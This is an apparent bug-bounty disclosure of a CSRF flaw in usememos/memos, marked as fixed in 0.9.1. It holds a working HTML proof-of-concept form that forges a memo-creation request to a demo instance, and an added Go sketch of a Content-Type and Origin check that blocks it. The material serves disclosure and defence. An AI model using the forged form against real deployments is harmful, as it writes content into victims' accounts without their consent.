Add any thoughts via CSRF in usememos/memos

Valid

Reported on

Dec 28th 2022


Description

An attacker can add arbitrary thoughts to any user's account via a CSRF attack.

When the attacker sends a link to the victim and the victim clicks on it, thoughts chosen by the attacker are added under the victim's account.

Proof of Concept

1. The attacker adds a thought in their own account and intercepts the request.

2. The attacker uses this request to generate a CSRF PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://demo.usememos.com/api/memo" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;content&quot;&#58;&quot;Test&#32;CSRF&quot;&#44;&quot;visibility&quot;&#58;&quot;PRIVATE&quot;&#44;&quot;resourceIdList&quot;&#58;&#91;&#93;&#125;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

POC

https://drive.google.com/file/d/11Hec1H-61UpoOLVi55uWRpLBUMLVjRbi/view?usp=share_link

Some sources on fixing CSRF

Add a CSRF token

https://www.freecodecamp.org/news/csrf-protection-problem-and-how-to-fix-it

https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
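
The PoC works because a `text/plain` form body of the shape `{...}=` still decodes as JSON when the server stream-decodes it and never checks `Content-Type`. The Go sketch below is an added example, not code from the report, from usememos/memos or from the fixing commit: it reproduces that behaviour against a stand-in handler and shows a Content-Type and Origin check that rejects the forged request, as a complement to the CSRF token recommended above. The names `createMemo`, `guard` and `send`, and the hosts `memos.example` and `attacker.example`, are hypothetical.

```go
package main

import (
	"encoding/json"
	"mime"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Constructed sample: the body a browser submits for the PoC form (text/plain encodes name=value).
const forgedBody = `{"content":"Test CSRF","visibility":"PRIVATE","resourceIdList":[]}=` + "\r\n"

// createMemo is a hypothetical stand-in for a handler that never checks Content-Type.
func createMemo(w http.ResponseWriter, r *http.Request) {
	var m struct{ Content string `json:"content"` }
	if err := json.NewDecoder(r.Body).Decode(&m); err != nil || m.Content == "" { // Decode stops after the first JSON value
		http.Error(w, "bad request", http.StatusBadRequest)
	}
}

// guard rejects state-changing requests that a cross-site HTML form can produce.
func guard(allowedOrigin string, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		safe := r.Method == http.MethodGet || r.Method == http.MethodHead || r.Method == http.MethodOptions
		mt, _, err := mime.ParseMediaType(r.Header.Get("Content-Type"))
		origin := r.Header.Get("Origin") // empty for non-browser clients
		switch {
		case !safe && (err != nil || mt != "application/json"): // forms cannot send application/json
			http.Error(w, "JSON required", http.StatusUnsupportedMediaType)
		case !safe && origin != "" && origin != allowedOrigin:
			http.Error(w, "cross-origin request", http.StatusForbidden)
		default:
			next.ServeHTTP(w, r)
		}
	})
}

// send replays a POST to /api/memo against h and returns the response status.
func send(h http.Handler, contentType, origin, body string) int {
	req := httptest.NewRequest(http.MethodPost, "/api/memo", strings.NewReader(body))
	req.Header = http.Header{"Content-Type": {contentType}, "Origin": {origin}}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	println(send(guard("https://memos.example", http.HandlerFunc(createMemo)), "text/plain", "https://attacker.example", forgedBody))
}
```

Without `guard`, the same forged request returns 200 because the trailing `=` is never read by the decoder.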

Impact

An attacker can add arbitrary thoughts to any user's account via a CSRF attack.

STEVEN validated this vulnerability 11 days ago
samirwaleed has been awarded the disclosure bounty
STEVEN marked this as fixed in 0.9.1 with commit c9bb2b 11 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 11 days ago